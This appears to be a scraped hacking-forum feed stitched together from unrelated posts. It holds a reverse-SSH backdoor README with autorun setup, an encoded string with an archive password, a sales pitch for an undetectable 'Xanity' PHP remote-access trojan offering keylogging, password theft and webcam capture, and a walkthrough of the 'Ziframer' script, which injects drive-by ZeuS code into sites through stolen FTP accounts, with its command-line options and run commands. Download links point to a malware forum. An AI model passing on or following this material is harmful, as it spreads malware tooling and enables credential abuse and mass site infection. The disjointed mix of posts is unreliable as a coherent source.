Intelligence and Security Committee. All of our operational processes rigorously support this position." Via: Snowden Docs: British Spies Used DDoS Attacks Against Anonymous
-
SSH Back is a set of shell scripts that assist you in shuffling an ssh connection over socat and ssl. README Have you ever needed to have access to an ssh server from behind a NAT'ed firewall? Now you can. SSHBack allows you to have reverse ssh connections connect back to you. Made from 100% FOSS recycled materials, this software is made to withstand the most demanding conditions, including, but not limited to: __FILL_IN_BLANK_HERE__ (For amusement purposes only. Do not abuse or misuse this product. Do not ruin anyone's day with this software, please!) sshback client machine: has openssh-server on sshback sever machine: has openssh-client on NOTE: "Server_Common_Name" must be able to DNS resolve on the client machine, e.g. $ host www.servercommonname.com www.servercommonname.com has address xxx.xxx.xxx.xxx run $ ./sshback_make_certs.sh to make all the certs then move client.pem, server.crt, and sshback_client.sh to the machine with openssh-server installed make sure 'socat' is installed chmod +x sshback_client.sh add line to /etc/rc.local like... /path/to/sshback_client.sh & ...to make it autorun then move server.pem, client.crt, and sshback_client.sh to the machine with openssh-client installed make sure 'socat' is installed chmod +x sshback_server.sh and then when you want to connect up, just ./sshback_server.sh and wait up to 1 minute it should connect back Download SSH Back 1.0 ? Packet Storm
-
g8FCAehdB85hA8YA38N5DL1daA1iBTOzgA3fwehbC8/xAJFz3McwwNFvgAZiEzFuBLCNAgOtgzhCXLcFgAvFvM=ezOwr8TwxB+QbzTBba+OsBAcuXL=hD5GG Base-64 X2 < Megan-35 < Esab-46 < Gila-7 Password archive: @fuckesetnod32@ Source: HF
-
Xanity is the best, cheapset and most stable PHP RAT on HF. It has a lot of unique Feature that take ratting on a new level. Never be afraid again! We keep the stub updated and FUD and with our built-in Scanner, that does not distribute, it will be FUD almost forever. Xanity uses CodeDom to compile the Stub to a very low Size(49kb). This program was written in VB (.Net Framework required) and uses PHP to communicate with the servers, so this works without opening any port. Don't hesitate to buy, Xanity, with its unbeatable design, price(20$) and functions, that no other PHP RAT can reach. Features: No Portforwarding Stable, Stealth & FUD Listen up to 10 HOSTS Over 150+ unique Features Built-in 38 AV Scanner Remote Taskmanager Host File Editor Remote CMD Keylogger Advanced Map View Recover PAsswords Autobuy ONLY 20$ Fun-, File-, & Registry-Manager Get deep SystemInformation Get installed Software Get Clipboard Image / Text Webcam Capture Desktop Capture Audio Capture And much more... Download Source: fuckav.ru
-
An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automaticly puts an Drive-by infection on the specified html, php or asp files. In this case the Iframer is a PHP-script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for 30$. The PHP script can bee launched via command line or accessed using a web browser: The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more then 18’000 stolen FTP credentials: In the file “iframe.txt” the attacker can define the (JavaScript- or HTML-) code he would like to inject: The cyberciminal has also the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt): Last but not least the attacker has to define where he wants to put the malicious code. He has the following options: start page – Inject the code at the top of the page end – Inject the code at the bottom of the page change – Replace a text or a string in the page with the malicious code check – Check if the malicious code is already on the page Now the cybercriminal has just to press the “START” button to run the script. The Iframer script will now get through the FTP accounts and inject the malicious code which is defined in the file “iframe.txt” (see this one). To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in russian and english. Content of readme.html (english): This script is designed to test the FTP accounts on the validity, insert the code into files on the FTP. [Features] [*] Console and Web interface [*] Stabilno runs under Windows and Nix BSD [*] Check for validity ftp [*] Paste the Code (at the beginning or end of file. Or a full overwrite the file to your text – defeys) [*] Strange Komentirovanie iframe’ov [*] Convenience logs [*] All akki (valid \ invalid) remain in the database. [*] The names of files, to insert the code can be set regExp’om, such as index \ .(.*)[_ b] or [_b ](.*). php | html | asp | htm. [*] It takes on all the folders on the site. [*] Function update replaces your old code to the new (for example, changed the addresses fryma) [Run] [!] Recommend to use the console interface Windows Open a console (Start-> Run-> cmd) Write to the path to php.exe for example c: \ php \ php.exe then write the path to the script (zifr.php) For example the so-c: \ php \ php.exe D: \ soft \ ziframer \ zifr.php the script will run and display a certificate. * NIX Open the console / ssh Write to php then write the path to the script (zifr.php) For example the so-php / home / user / soft / ziframer / zifr.php the script will run and display a certificate. [Options] -file -f Path to the file to your FTP -code -c path to a file with code introduced -inject -i Where vstavlt code three options start – top of the page end – in the bottom of the page change – replace the text in the page code -time -t Timeout for connecting to the FTP -del -d With this option chyuzhye ifremy komentiruyutsya -update -u Update your code with this option, the script ishet inserted your code and replaces it with a new -good -g file where badat skladyvatsya working FTP -bad -b file where badat skladyvatsya not working FTP -hide -h If you enable this option, your code will not markerovatsya but you will not be able to use the function update -restore -r Continue from the last FTP if you had not had time to do the whole list you can start from where you stopped Conclusion The Ziframe script is very simple an cheap. Even a n00b is able to use it. It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one shows how infection vectors are more and more shifted from E-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market. Download Source fuckav.ru
-
A bash script for when you feel lazy. Adds quite a few tools to Kali Linux. Bleeding Edge Repos AngryIP Scanner Terminator Xchat Unicornscan Nautilus Open Terminal Simple-Ducky Subterfuge Ghost-Phisher Yamas PwnStar Ettercap0.7.6 Xssf Smbexec Flash Java Easy-Creds Java ... and more! Lazy-Kali will also update Kali, Start Metaploit Services, Start Stop And Update Open-Vas This is the first version, script is self updating so more will be added in a short time. Will try to add requested features. Installation: Download Project
-
- kali-linux
- lazy-kali
-
(and 1 more)
Tagged with:
-
root@root:~# clear root@root:~# nano sms.py root@root:~# python sms.py File "sms.py", line 45 carrier_attack = "@alltelmessage.com" ^ IndentationError: expected an indented block root@root:~#